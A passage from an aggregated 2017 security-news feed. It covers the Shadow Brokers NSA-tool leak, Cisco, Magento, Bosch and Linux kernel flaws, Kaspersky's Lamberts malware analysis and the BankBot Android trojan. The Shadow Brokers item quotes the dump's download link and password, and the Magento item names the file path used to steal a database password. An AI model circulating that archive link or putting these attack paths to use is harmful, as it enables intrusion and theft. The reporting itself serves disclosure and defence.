Facebook's security team spent six months fighting to neutralize what they saw as a coordinated campaign, according to Shabnam Shaik, a company security manager.
"Our systems were able to identify a large portion of this illegitimate activity -- and to remove a substantial number of inauthentic likes," Shaik said in a blog post.
"By disrupting the campaign now, we expect that we will prevent this network of spammers from reaching its end goal of sending inauthentic material to large numbers of people."
The ring used accounts in a number of countries including Bangladesh, Indonesia and Saudi Arabia.
The group tried to mask its activities with tactics like connecting with the social network through "proxy" servers to disguise where "likes," posts or other communications were originating, according to Shaik.
Facebook said the campaign aimed to trick people into connecting as friends they would later target with spam. The company said it had derailed the operation early enough to spare users that fate.
The leading social network this week said it has started weeding out bogus accounts by watching for suspicious behavior such as repetitive posts or torrents of messages.
The security improvement was described as being part of a broader effort to rid the leading social network of hoaxes, misinformation and fake news by verifying people's identities.
"We've found that when people represent themselves on Facebook the same way they do in real life, they act responsibly," Shaik said.
"Fake accounts don't follow this pattern, and are closely related to the creation and spread of spam."
Under pressure to stymie the spread of fake news, Facebook has taken a series of steps including making it easier to report such posts and harder to earn money from them.
Veteran Industrial Cybersecurity Firm PAS Raises $40 Million
15.4.2017 securityweek Cyber
With deep roots in software solutions for process safety and asset reliability for industrial firms, Houston, TX-based PAS announced this week that it has taken a $40 Million investment that will be used to fuel its Industrial control system (ICS) cybersecurity business.
While many new startups have emerged in the industrial cybersecurity space in recent years, PAS has been around for 23 years and says its solutions are deployed in more than 1,100 facilities globally in more than 70 countries.
Previously known as Plant Automation Services, Inc. (“PAS”), the company has reorganized under the new corporate name PAS Global, and will use the investment to expand its security solutions portfolio and support global growth.
PAS Raises $40 MillionFounded by Eddie Habibi, who currently serves as CEO, the company has not taken any outside funding before.
“PAS has a 23-year tradition of making industrial process facilities safer and more reliable,” Habibi said in a statement. “Our deep expertise in control systems and production-centric approach to securing ICS give us a formidable competitive advantage.”
The company helps customers comply with regulatory standards including NERC CIP, NIST, and IEC 62443, with offerings including ICS cybersecurity, automation asset management, IPL assurance, alarm management, high performance HMI, boundary management, and control loop performance optimization.
“This funding round will expand PAS sales and marketing across its global offices as well as increase research and development for Cyber Integrity, its flagship cybersecurity software product,” the company said. “Cyber Integrity protects critical infrastructure from risks associated with rising industrial internet of things (IoT) adoption, malicious cyber attacks, and insider threats.”
The $40 million growth investment came from investment firm Tinicum, a private investment partnership focused on late stage investments in manufacturing, energy, technology, media, and infrastructure.
Shadows Brokers released another archive that suggests NSA compromised a SWIFT system
15.4.2017 securityaffairs BigBrothers
The Shadow Brokers group released a 117.9 MB encrypted dump containing documents that suggest NSA hacker SWIFT system in the Middle East.
Last week, the notorious Shadow Brokers hackers group that claimed to have stolen the hacking tools and exploits from the NSA has leaked the password for an encrypted cache of Unix hacking tools and exploits, including a remote root zero-day exploit for Solaris OS and the TOAST framework.
Today the Shadow Brokers group has released another piece of the precious archive alleged stolen to the NSA, a 117.9 MB encrypted dump, it includes three folders named Windows, Swift, and OddJob including 23 new hacking tools.
Some of the codenames for the hacking tools in the archive are OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit, EnglishMansDentist, MofConfig, ErraticGopher, EmphasisMine, EmeraldThread, EternalSynergy, EwokFrenzy, ZippyBeer, ExplodingCan, DoublePulsar.
The tools and exploits released today have been specifically designed to target earlier versions of Windows operating system, this last bunch of documents suggests the NSA was targeting the SWIFT banking system of several banks around the world.
The hackers published a blog post titled “Lost in Translation,” which included a link to the archive and the password.
“Follow the links for new dumps. Windows. Swift. Oddjob. Oh you thought that was it? Some of you peoples is needing reading comprehension.
https://yadi.sk/d/NJqzpqo_3GxZA4
Password = Reeeeeeeeeeeeeee
” reads the blog post.
The overall archive was now available on GitHub, including the last portion.
Of course, security researchers immediately started digging the precious trove of files.
Follow
x0rz @x0rz
Windows exploits, payloads and implants of #EquationGroup dumped by the #ShadowBrokers: confirmed.
11:44 AM - 14 Apr 2017
239 239 Retweets 206 206 likes
Follow
Hacker Fantastic @hackerfantastic
EMERALDTHREAD is an exploit (unpatched?) for Windows XP to Windows 2003 SP2.
3:04 PM - 14 Apr 2017
8 8 Retweets 7 7 likes
The hacking tools in the Windows folder work against older versions of Windows (Windows XP) and Server 2003.
The folder OddJob contains a Windows implant and includes alleged configuration files and payloads, also in this case targeted versions are older ones like Windows Server 2003 Enterprise up to Windows XP Professional.
According to the Security expert Kevin Beaumont, who analyzed the dump, some of the Windows exploits were able to avoid detection.
Segui
Kevin Beaumont ✔ @GossiTheDog
So far the first 3 exploits in Windows/Exploits haven't been on VirusTotal before, nor in Palo-Alto Autofocus.
12:45 - 14 Apr 2017
5 5 Retweet 9 9 Mi piace
But the SWIFT folder contains a PowerPoint document that could reveal a disconcerting reality. The PPT contains credentials and data on the internal architecture of EastNets, one of the largest SWIFT Service Bureau in the Middle East.
The folder includes SQL scripts that could be used to query Oracle Database to obtain a wide range of information, including the list of users and the SWIFT message queries.
The folder also contains Excel files that demonstrate the NSA’s linked Equation Group had hacked many banks worldwide, most of them in countries in the Middle East (i.e.UAE, Kuwait, Qatar, Palestine, and Yemen).
Segui
Matt Suiche ✔ @msuiche
SWIFT Host of Palestinian Bank was running Windows 2008 R2 vulnerable to exploit framework FUZZBUNCH. #ShadowBrokers cc @hackerfantastic
17:48 - 14 Apr 2017
41 41 Retweet 32 32 Mi piace
But EastNets’ CEO has denied NSA hackers ever compromised the systems of the company.
“The reports of an alleged hacker-compromised EastNets Service Bureau (ENSB) network is totally false and unfounded,” EastNets’ CEO Hazem Mulhim told Motherboard in an email. “The EastNets Network internal Security Unit has ran a complete check of its servers and found no hacker compromise or any vulnerabilities.” reads the official statement issued by the company.
“The EastNets Service Bureau runs on a separate secure network that cannot be accessed over the public networks. The photos shown on twitter, claiming compromised information, is about pages that are outdated and obsolete, generated on a low-level internal server that is retired since 2013.”
“While we cannot ascertain the information that has been published, we can confirm that no EastNets customer data has been compromised in any way”
Cisco warns of two critical issues in IOS and Apache Struts
14.4.2017 securityaffairs Vulnerebility
Cisco issued two “critical” security advisories, one for Cisco IOS and Cisco IOS XE Software, another for a flaw affecting Apache Struts 2.
Today Cisco issued two “critical” security advisories, the first one for Cisco IOS and Cisco IOS XE Software, the second one for the recently discovered flaw affecting Apache Struts 2.
The vulnerability in Cisco IOS affects the Cisco Cluster Management Protocol (CMP) that could be exploited by an unauthenticated, remote attacker to trigger a DoS condition via a reload of the device, or remotely execute code with elevated privileges.
“A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges.” reads the Cisco Security Advisory.
According to Cisco a wide range of devices is affected by the flaw, including the Cisco Catalyst 2350-48TD-S Switch and the Cisco SM-X Layer 2/3 EtherSwitch Service Module.
“The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and the incorrect processing of malformed CMP-specific Telnet options.” states Cisco.
The attacker can exploit the vulnerability establishing a Telnet session with vulnerable devices and by sending malformed CMP-specific Telnet options. At the time, I was writing there is no workaround to temporary fix the problem.
“An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device,” continues the advisory.
As for the flaw in Apache Struts2, Cisco confirmed that some products using the application could be remotely hacked. The remote code execution flaw disclosed by Apache in March, tracked as CVE-2017-5638, affects the Jakarta-based file upload Multipart parser.
The IT giant is still investigating its products to determine affected products, as for now the company confirmed that Cisco SocialMiner, Identity Services Engine (ISE), Prime License Manager and others are affected.
Unraveling the Lamberts Toolkit
14.4.2017 Kaspersky Attack
Yesterday, our colleagues from Symantec published their analysis of Longhorn, an advanced threat actor that can be easily compared with Regin, ProjectSauron, Equation or Duqu2 in terms of its complexity.
Longhorn, which we internally refer to as “The Lamberts”, first came to the attention of the ITSec community in 2014, when our colleagues from FireEye discovered an attack using a zero day vulnerability (CVE-2014-4148). The attack leveraged malware we called ‘BlackLambert’, which was used to target a high profile organization in Europe.
Since at least 2008, The Lamberts have used multiple sophisticated attack tools against high-profile victims. Their arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools, and wipers. Versions for both Windows and OSX are known at this time, with the latest samples created in 2016.
Although the operational security displayed by actors using the Lamberts toolkit is very good, one sample includes a PDB path that points to a project named “Archan~1” (perhaps ‘Archangel’). The root folder on the PDB path is named “Hudson”. This is one of the very few mistakes we’ve seen with this threat actor.
While in most cases the infection vector remains unknown, the high profile attack from 2014 used a very complex Windows TTF zero-day exploit (CVE-2014-4148).
Kaspersky Lab products successfully detect and eradicate all the known malware from the Lamberts family. For more information please contact: intelreports@kasperskycom
Figure 1. Lamberts discovery timeline
The first time the Lambert family malware was uncovered publicly was in October 2014, when FireEye posted a blog about a zero day exploit (CVE-2014-4148) used in the wild. The vulnerability was patched by Microsoft at the same time. We named the malware involved ‘Black Lambert’ and described it thoroughly in a private report, available to Kaspersky APT Intel Reports subscribers.
The authors of Black Lambert included a couple of very interesting details in the sample, which read as the following: toolType=wl, build=132914, versionName = 2.0.0. Looking for similar samples, we were able to identify another generation of related tools which we called White Lambert. While Black Lambert connects directly to its C&C for instructions, White Lambert is a fully passive, network-driven backdoor.
Black Lambert White Lambert
Implant type Active Passive
toolType wl aa (“ArchAngel”)
build 132914 113140
versionName 2.0.0 5.0.2
Internal configuration similarities in Black and White Lambert
White Lambert runs in kernel mode and intercepts network traffic on infected machines. It decrypts packets crafted in a special format to extract instructions. We named these passive backdoors ‘White Lambert’ to contrast with the active “Black Lambert” implants.
Looking further for any other malware related to White Lambert and Black Lambert, we came by another generation of malware that we called Blue Lambert.
One of the Blue Lambert samples is interesting because it appears to have been used as second stage malware in a high profile attack, which involved the Black Lambert malware.
Looking further for malware similar to Blue Lambert, we came by another family of malware we called Green Lambert. Green Lambert is a lighter, more reliable, but older version of Blue Lambert. Interestingly, while most Blue Lambert variants have version numbers in the range of 2.x, Green Lambert is mostly in 3.x versions. This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant. Perhaps both Blue and Green Lamberts have been developed in parallel by two different teams working under the same umbrella, as normal software version iterations, with one seeing earlier deployment than the other.
Signatures created for Green Lambert (Windows) have also triggered on an OS X variant of Green Lambert, with a very low version number: 1.2.0. This was uploaded to a multiscanner service in September 2014. The OS X variant of Green Lambert is in many regards functionally identical to the Windows version, however it misses certain functionality such as running plugins directly in memory.
Kaspersky Lab detections for Blue, Black, and Green Lamberts have been triggered by a relatively small set of victims from around the world. While investigating one of these infections involving White Lambert (network-driven implant) and Blue Lambert (active implant), we found yet another family of tools that appear to be related. We called this new family Pink Lambert.
The Pink Lambert toolset includes a beaconing implant, a USB-harvesting module and a multi-platform orchestrator framework which can be used to create OS-independent malware. Versions of this particular orchestrator were found on other victims, together with White Lambert samples, indicating a close relationship between the White and Pink Lambert malware families.
By looking further for other undetected malware on victims of White Lambert, we found yet another apparently related family. The new family, which we called Gray Lambert is the latest iteration of the passive network tools from the Lamberts’ arsenal. The coding style of Gray Lambert is similar to the Pink Lambert USB-harvesting module, however, the functionality mirrors that of White Lambert. Compared to White Lambert, Gray Lambert runs in user mode, without the need for exploiting a vulnerable signed driver to load arbitrary code on 64-bit Windows variants.
Connecting all these different families by shared code, data formats, C&C servers, and victims, we have arrived at the following overarching picture:
Figure 2. An overview of connections between the Lambert families
The Lamberts in Brief – from Black to Gray
Below, we provide a small summary of all the Lamberts. A full description of all variants is available to subscribers of Kaspersky APT Reports. Contact intelreports@kaspersky.com
Black Lambert
The only known sample of Black Lambert was dropped by a TTF-exploit zero day (CVE-2014-4148). Its internal configuration included a proxy server which suggests the malware was created to work in a very specific network configuration, inside the victim’s network.
An internal description of Black Lambert indicates what appears to be a set of markers used by the attackers to denote this particular branch: toolType=wl, build=132914, versionName = 2.0.0.
Hash Description
683afdef710bf3c96d42e6d9e7275130 generic loader (hdmsvc.exe)
79e263f78e69110c09642bbb30f09ace winlib.dll, final payload (toolType=wl)
Blue Lambert
The Blue Lambert implants contain what appear to be version numbers in the 2.x range, together with project/operation codename sets, which may also indicate codenames for the victims or campaigns.
Figure 4. Blue Lambert configuration in decrypted form, highlighting internal codenames
Known codenames include TRUE CRIME (2.2.0.2), CERVELO YARDBIRD (2.6.1.1), GAI SHU (2.2.0.5), DOUBLESIDED SCOOBYSNACK (2.3.0.2), FUNNELCAKE CARNIVAL (2.5.0.2), PROSPER SPOCK (2.0.0.2), RINGTOSS CARNIVAL (2.4.2.2), COD FISH (2.2.0.0), and INVERTED SHOT (2.6.2.3).
Green Lambert
Green Lambert is a family of tools deeply related to Blue Lambert. The functionality is very similar, both Blue and Green are active implants. The configuration data shares the same style of codenames for victims, operations, or projects.
Figure 5. Green Lambert configuration block (decrypted) highlighting internal codenames
The Green Lambert family is the only one where non-Windows variants have been found. An old version of Green Lambert, compiled for OS X was uploaded from Russia to a multiscanner service in 2014. Its internal codename is HO BO (1.2.0).
The Windows versions of Green Lambert have the following code names: BEARD BLUE (2.7.1), GORDON FLASH (3.0), APE ESCAPE (3.0.2), SPOCK LOGICAL (3.0.2), PIZZA ASSAULT (3.0.5), and SNOW BLOWER (3.0.5).
Interestingly, one of the droppers of Green Lambert abused an ICS software package named “Subway Environmental Simulation Program” or “SES”, which has been available on certain forums visited by engineers working with industrial software. Similar techniques have been observed in the past from other threat groups, for instance, trojanized Oracle installers by the Equation group.
White Lambert
White Lambert is a family of tools that share the same internal description as Black Lambert. Known tool types, builds, and version names include:
ToolType “aa”, protocol 3, version 7, versionName 5.0.2, build 113140
ToolType “aa”, protocol 3, version 7, versionName 5.0.0, build 113140
ToolType “aa”, protocol 3, version 6, versionName 4.2.0, build 110836M
ToolType “aa”, protocol 3, version 5, versionName 3.2.0
One of the White Lambert samples is interesting because it has a forgotten PDB path inside, which points to “Archan~1l” and “Hudson”. Hudson could point to a project name, if the authors name their projects by rivers in the US, or, it could also be the developer’s first name. The truncated (8.3) path “archan~1” most likely means “Archangel”. The tool type “aa” could also suggest “ArchAngel”. By comparison, the Black Lambert tool type “wl” has no known meaning.
White Lambert samples run in kernel mode and sniff network traffic looking for special packets containing instructions to execute. To run unsigned code in kernel mode on 64-bit Windows, White Lambert uses an exploit against a signed, legitimate SiSoftware Sandra driver. The same method was used before by Turla, ProjectSauron, and Equation’s Grayfish, with other known, legitimate drivers.
Pink Lambert
Pink Lambert is a suite of tools initially discovered on a White Lambert victim. It includes a beaconing implant, partially based on publicly available source code. The source code on top of which Pink Lambert’s beaconing implant was created is “A Fully Featured Windows HTTP Wrapper in C++”.
Figure 6. “A Fully Featured Windows HTTP Wrapper” by shicheng
Other tools in the Pink Lambert suite include USB stealer modules and a very complex multi-platform orchestrator.
In a second incident, a Pink Lambert orchestrator was found on another White Lambert victim, substantiating the connection between the Pink and White Lamberts.
Gray Lambert
Gray Lambert is the most recent tool in the Lamberts’ arsenal. It is a network-driven backdoor, similar in functionality to White Lambert. Unlike White Lambert, which runs in kernel mode, Gray Lambert is a user-mode implant. The compilation and coding style of Gray Lambert is similar to the Pink Lambert USB stealers. Gray Lambert initially appeared on the computers of victims infected by White Lambert, which could suggest the authors were upgrading White Lambert infections to Gray. This migration activity was last observed in October 2016.
Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll – it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice.
Timeline
Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block: a hostname and an IP address. Using our own pDNS as well as DomainTools IP history, we plotted the times when the C&C servers were active and pointing to the same IP address as the one from the configuration block.
Unfortunately, this method doesn’t work for all samples, since some of them don’t have a domain for C&C. Additionally, in some cases we couldn’t find any pDNS information for the hostname configured in the malware.
Luckily, the attackers have made a few mistakes, which allow us to identify the activity times for most of the other samples. For instance, in case when no pDNS information was available for a subdomain on top of the main C&C domain, the domain registration dates were sufficient to point out when the activity began. Additionally, in some cases the top domain pointed to the same IP address as the one from the configuration file, allowing us to identify the activity times.
Another worthwhile analysis method focuses on the set of Blue Lambert samples that have exports. Although most compilation timestamps in the PE header appear to have been tampered (to reflect a 2003-2004 range), the authors forgot to alter the timestamps in the export section. This allowed us to identify not just the activity / compilation timestamps, but also the method used for faking the compilation timestamps in the PE header.
It seems the algorithm used to tamper with the samples was the following: subtract 0x10 from the highest byte of timestamp (which amounts to about 8 and half years) and then randomize the lowest 3 bytes. This way we conclude that for Blue Lamberts, that original compilation time of samples was in the range of 2012-2015.
Putting together all the various families, with recovered activity times, we come to the following picture:
Figure 8. A timeline of activity for known Lamberts
As it can be seen from the chart above, Green Lambert is the oldest and longest-running in the family, while Gray is the newest. White, Blue and Pink somehow overlap in deployment, with Blue replacing Green Lambert. Black Lambert was seen only briefly and we assume it was “retired” from the arsenal after being discovered by FireEye in 2014.
Codenames and Popular Culture Referenced in Lamberts
The threat group(s) behind the Lambert toolkits have used a large number of codenames extensively throughout their projects. Some of these codenames are references to old computer games, Star Trek, and cartoons, which is very unusual for high profile APT groups. We really enjoyed going through the backstories of these codenames and wanted to provide them below for others to enjoy as well.
For instance, one of the Green Lambert versions has the internal codename “GORDON FLASH”, which can also be read as “FLASH GORDON”. Flash Gordon is the hero of a space opera adventure comic strip created by and originally drawn by Alex Raymond. It was first published in 1934 and subsequently turned into a popular film in 1980.
Flash Gordon poster
A ‘Funnel cake’ is a regional food popular in North America at carnivals, fairs, sporting events, and seaside resorts. This explains the codename “FUNNELCAKE CARNIVAL”:
Figure 9. A typical funnel cake
Spock and Prosper obviously refers to Star Trek, the well-known science fiction television series created by Gene Roddenberry. Cdr. Spock is a half-Vulcan, half-human character, portrayed by Leonard Nimoy. “Live long and prosper” is the traditional Vulcan greeting in the series.
Leonard Nimoy as “Spock” displaying the traditional Vulcan greeting “Live long and prosper”
Ringtoss is a game that is very popular at carnivals in North America.
DOUBLESIDED SCOOBYSNACK is likely a reference to an NFL Lip Reading video featuring Adrian Peterson that went viral in mid-2013. According to the urban dictionary, it is also used to denote a sexual game in which the participants are dressed as Scooby-Doo and his master.
Ape Escape (also known as Saru Get You (サルゲッチュ Saru Getchu) in Japan) is a series of video games made by SCE Japan Studio, starting with Ape Escape for PlayStation in 1999. The series often incorporates ape-related humor, unique gameplay, and a wide variety of pop culture references; it is also notable for being the first game to make the DualShock or Dual Analog controller mandatory.
Ape Escape
INVERTED SHOT is likely a reference to a mixed martial arts move also known as an ‘Imanari roll takedown’, named after Masakazu Imanari who popularized the grappling technique. It consists of a modified Brazilian jiu-jitsu granby roll that places the fighter in inverted guard position while taking the opponent down to the mat.
GAI and SHU (as used in Green Lambert OS X) are characters from the Guilty Crown anime series. Gai Tsutsugami (恙神 涯 Tsutsugami Gai) is the 17-year-old resourceful and charismatic leader of the “Funeral Parlor” resistance group, while Shu Ouma (桜満 集 Ōma Shū) is the 17-year-old main protagonist of Guilty Crown.
Figure 10. Main characters of Guilty Crown with Shu Ouma in the middle.
Conclusions
The Lamberts toolkit spans across several years, with most activity occurring in 2013 and 2014. Overall, the toolkit includes highly sophisticated malware, which relies on high-level techniques to sniff network traffic, run plugins in memory without touching the disk, and leverages exploits against signed drivers to run unsigned code on 64-bit Windows.
To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit, deployment of Black Lambert included a rather sophisticated TTF zero day exploit, CVE-2014-4148. Taking that into account, we classify the Lamberts as the same level of complexity as Regin, ProjectSauron, Equation and Duqu2, which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed.
Considering the complexity of these projects and the existence of an implant for OS X, we assume that it is highly possible that other Lamberts also exist for other platforms, such as Linux. The fact that in the vast majority of cases the infection method is unknown probably means there are still a lot of unknown details about these attacks and the group(s) leveraging them.
As usual, defense against attacks such as those from the Lamberts/Longhorn should include a multi-layered approach. Kaspersky products include special mitigation strategies against the malware used by this group, as well as the many other APT groups we track. If you are interested in reading more about effective mitigation strategies in general, we recommend the following articles:
Strategies for mitigating APTs
How to mitigate 85% of threats with four strategies
We will continue tracking the Lamberts and sharing new findings with our intel report subscribers, as well as with the general public. If you would like to be the first to hear our news, we suggest you subscribe to our intel reports.
Kaspersky Lab products successfully detect and eradicate all the known malware from the Lamberts family.
Unpatched Magento Flaw Exposes Online Stores to Attacks
14.4.2017 securityweek Vulnerebility
Magento, the popular e-commerce platform used by more than 250,000 merchants worldwide, is affected by a potentially serious vulnerability that can be exploited to hijack online stores, researchers warned.
The flaw was found by DefenseCode in November and reported to Magento via the company’s Bugcrowd-based bug bounty program. The vendor indicated at the time that it had been aware of the issue, but it still hasn’t addressed it. After its attempts to obtain a status update on the vulnerability failed, DefenseCode decided to make its findings public.
The vulnerability is related to a feature that allows users to add Vimeo video content for an existing product. When a video is added, Magento automatically retrieves a preview image via a POST request.
This request method can be changed from POST to GET, allowing an attacker to launch a cross-site request forgery (CSRF) attack and upload an arbitrary file. While invalid image files are not allowed, the file is still saved on the server before it is validated.
The location of the file can be easily determined, enabling a hacker to upload a malicious PHP script to the server. In order to achieve remote code execution, the attacker also needs to upload a .htaccess file to the same directory.
For the attack to work, a hacker needs to convince a user with access to the shop’s administration panel, regardless of their role and permissions, to access a specially crafted web page that triggers the CSRF attack.
Researchers warned that successful exploitation of the vulnerability can allow an attacker to take complete control of a targeted system, including gain access to sensitive customer information stored in the compromised store’s database.
“Full administrative access is not required to exploit this vulnerability as any Magento administrative panel user regardless of assigned roles and permissions can access the remote image retrieval functionality. Therefore, gaining a low privileged access can enable the attacker to compromise the whole system or at very least, the database (e.g. traversing to /app/etc/env.php to grab the database password),” DefenseCode wrote in its advisory.
The latest security updates were released by Magento developers in February, when they addressed a critical remote code execution vulnerability that allegedly affected only few systems.
Flaws in Bosch Car Dongle Allow Hackers to Stop Engine
14.4.2017 securityweek Vulnerebility
Vulnerabilities found by researchers in Bosch’s Drivelog Connect product can be exploited by hackers to inject malicious messages into a vehicle’s CAN bus. The vendor has implemented some fixes and is working on adding more attack protections.
Bosch’s Drivelog Connect is a service that provides information about the condition of a vehicle, including potential defects, service deadlines, and data on fuel consumption and driving behavior. The product includes a dongle called Drivelog Connector, which is connected to the car’s OBD2 diagnostics interface, and a mobile application that communicates with the dongle via Bluetooth.
Researchers at automotive cybersecurity firm Argus have identified some potentially serious vulnerabilities in the communications between the mobile app and the dongle.Vulnerabilities in Bosch’s Drivelog Connect
One of the security holes is related to the authentication process between the Drivelog Connector and the Drivelog Connect smartphone app. The app is available for both iOS and Android, but experts focused on the Android application. The second flaw affects the dongle’s message filter.
According to researchers, diagnostic messages can only be sent to the CAN bus using a valid service ID. However, this message filter can be bypassed by sending OEM-specific messages that can be obtained through CAN traffic monitoring or by fuzzing CAN bus messages.
An attack leveraging this message filter bypass can be launched by a hacker who has obtained root access to the targeted user’s smartphone. During the tests they conducted, Argus researchers said they managed to remotely stop the engine of a moving car by exploiting the vulnerability. They pointed out that, depending on the make and model of the car, other actions may have been possible.
This attack scenario requires root access to the Android device and a malicious patch to the mobile app. Car manufacturers have often pointed out that it’s difficult to prevent attacks once a smartphone has been compromised.
However, Argus researchers have found a way to launch attacks without this requirement. An information disclosure vulnerability in the authentication process between the app and the dongle allows an attacker to connect to a targeted device without hacking the phone first.
During the authentication process, the dongle sends any connecting Android device various pieces of information that can be used to obtain the user-supplied authorization PIN. The PIN can be brute-forced offline – the attack takes up to 30 minutes on a modern laptop – and it can then be used to connect to the dongle.
Once the connection has been completed, the attacker can send malicious CAN bus messages from their own device, instead of having to hijack the targeted user’s smartphone. This attack is mitigated by the fact that the hacker needs to be in Bluetooth range of the targeted vehicle.
In an advisory it published this week, Bosch said it addressed the authentication vulnerability on the server side by introducing two-step verification when additional users are registered to a device. The company is also working on a firmware update for the dongle to prevent attackers from sending unauthorized CAN messages from a hijacked mobile app.
Android Trojan Targeting Over 420 Banking Apps Worldwide Found On Google Play Store
14.4.2017 thehackernews Android
Do you like watching funny videos online?
I am not kind of a funny person, but I love watching funny videos clips online, and this is one of the best things that people can do in their spare time.
But, beware if you have installed a funny video app from Google Play Store.
A security researcher has discovered a new variant of the infamous Android banking Trojan hiding in apps under different names, such as Funny Videos 2017, on Google Play Store.
Niels Croese, the security researcher at Securify B.V firm, analyzed the Funny Videos app that has 1,000 to 5,000 installs and found that the app acts like any of the regular video applications on Play Store, but in the background, it targets victims from banks around the world.
This newly discovered banking Trojan works like any other banking malware, but two things that makes it different from others are — its capability to target victims and use of DexProtector tool to obfuscate the app's code.
Dubbed BankBot, the banking trojan targets customers of more than 420 banks around the world, including Citibank, ING, and some new Dutch banks, like ABN, Rabobank, ASN, Regiobank, and Binck, among many others.
How Android Banking Trojan Works
In a nutshell, BankBot is mobile banking malware that looks like a simple app and once installed, allows users to watch funny videos, but in the background, the app can intercept SMS and display overlays to steal banking information.
Mobile banking trojan often disguises itself as a plugin app, like Flash, or an adult content app, but this app made its way to Google Play Store by disguising itself as any other regular Android app.
Google has removed this malicious app from its Play Store after receiving the report from the researcher, but this does not mean that more such apps do not exist there with different names.
"Another problem is that Google [Play Store] mainly relies on automated scanning without a full understanding of the current obfuscation vectors resulting in banking malware on the Google Play Store." researcher told The Hacker News.
Once downloaded, the app persistently requests administrative rights, and if granted, the banking malware can control everything that's happening on an infected smartphone.
The BankBot springs into action when the victim opens any of the mobile apps from a pre-configured list of 425 banking apps. A complete list of banks a BankBot variant is currently imitating can be found on the blog post published by the researcher.
Once one of the listed apps is opened, BankBot immediately displays an overlay, which is a page on the top of legitimate mobile banking app and tricks Android users entering their banking credentials into the overlay, just like a phishing attack.
This will not only sends your banking credentials to your bank’s servers but also sends your financial credentials to the server controlled by fraudsters.
This social engineering technique is often used by financially motivated criminals to deceive users into giving up their personal details and sensitive banking information to fraudsters.
How to protect yourself?
There are standard protection measures you need to follow to remain unaffected:
Install a good antivirus app that can detect and block such malware before it can infect your device. Always keep the app up-to-date.
Always stick to trusted sources, like Google play Store and the Apple App Store, and verify app permissions before installing apps. If any app is asking more than what it is meant for, just do not install it.
Do not download apps from third party source. Although in this case, the app is being distributed through the official Play Store, most often such malware are distributed via untrusted third-party app stores.
Avoid unknown and unsecured Wi-Fi hotspots and Keep your Wi-Fi turned OFF when not in use.
Be careful which apps you give administrative rights to. Admin rights are powerful and can give an app full control of your device.
Never click on links in SMS or MMS sent to your mobile phone. Even if the email looks legit, go directly to the website of origin and verify any possible updates.
Here's How Hacker Activated All Dallas Emergency Sirens On Friday Night
14.4.2017 thehackernews Incindent
Last weekend when outdoor emergency sirens in Dallas cried loudly for over 90 minutes, many researchers concluded that some hackers hijacked the alarm system by exploiting an issue in a vulnerable computer network.
But it turns out that the hackers did not breach Dallas' emergency services computer systems to trigger the city's outdoor sirens for tornado warnings and other emergencies, rather they did it entirely on radio.
According to a statement issued on Monday, Dallas City Manager T.C. Broadnax clarified the cause of the last Friday's chaos, saying the "hack" used a radio signal that spoofed the system used to control the siren network centrally.
"I don't want someone to understand how it was done so that they could try to do it again," Broadnax said without going much into details. "It was not a system software issue; it was a radio issue."
First installed in 2007, the Dallas outdoor emergency warning system powers 156 sirens made by a company called Federal Signal.
The city officials did not provide details on how the Emergency Alert System (EAS) works, but noted that "it's a tonal-type system" that's usually controlled by tone combinations used by the EAS broadcast over the National Weather Service's weather radio, and by Dual-Tone Multi-Frequency (DTMF) or Audio Frequency Shift Keying (AFSK) encoded commands from a command center terminal sent over an emergency radio frequency.
The Federal Communications Commission (FCC) currently has the 700MHz range of radio frequency reserved for US public safety.
This suggests that the emergency system could be compromised by outside radio equipment replicating the tonal code required to trigger the alarms — which, in other words, is known as a "radio replay" attack.
It is believed that the hacker who managed to trigger alarm last Friday somehow managed to gain access to the siren system documentation to know the exact tonal commands that trigger an alarm, and then just played that command signal repeatedly.
According to the city officials, the decade-old radio-based system was disabled hours after the breach and went live over the weekend with encryption to protect the language of tones as a measure to prevent such attacks.
The Dallas City Council has also voted to pay $100,000 more to its emergency siren system contractor to increase the security of the city's current system.
CVE-2016-10229 Linux remote code execution flaw potentially exposes systems at risk of hack
14.4.2017 securityaffairs Vulnerebility
The Linux remote vulnerability tracked as CVE-2016-10229 poses Linux systems at rick of hack if not patched.
A Linux kernel vulnerability, trackers as CVE-2016-10229, potentially allows attackers to remotely take over a vulnerable system (i.e. Servers, desktops, IoT devices and mobile devices).
“udp.c in the Linux kernel before 4.5 allows remote attackers to execute arbitrary code via UDP traffic that triggers an unsafe second checksum calculation during execution of a recv system call with the MSG_PEEK flag.” reads the description of the flaw published by the NDV.
The CVE-2016-10229 flaw expose systems to attacks via UDP traffic, according to the experts. the attackers can potential hack a system running a software receiving data through the system call recv() with the MSG_PEEK flag set on. This means that attackers would send to the target specifically crafted packets that trigger the CVE-2016-10229 flaw by forcing a second checksum operation on the incoming data. In this way, the attacker can execute malicious code within the kernel with root privileges, fortunately the issue is hard to exploit as explained by the popular Google Project Zero hacker Tavis Ormandy.
16h
Dan Rosenberg @djrbliss
I have reviewed the relevant code and I mostly understand it, but I'm missing the security ramifications.
Follow
Tavis Ormandy ✔ @taviso
@djrbliss I'm as confused as you are...
7:18 PM - 13 Apr 2017
4 4 Retweets 17 17 likes
Common software, like the Nginx web server, set the MSG_PEEK flag on some connections, potentially exposing the system to the attack.
The bug can also be potentially exploited by a local attacker to escalate privileges.
The vulnerability was discovered by the expert from Google Eric Dumazet who explained that the issue dates back the end of 2015 when a small fix was applied to the Linux kernel.
Affected versions are the Kernel versions below 4.5, all the way down to 2.6, are likely at risk, major Linux distribution such as Ubuntu and Debian were distributing fixed builds of the kernel by February this year.
According to Red Hat, it Linux distribution were never affected by the CVE-2016-10229 flaw.
Google has already rolled out security patches for Android that also fixed the CVE-2016-10229 in mobile devices.
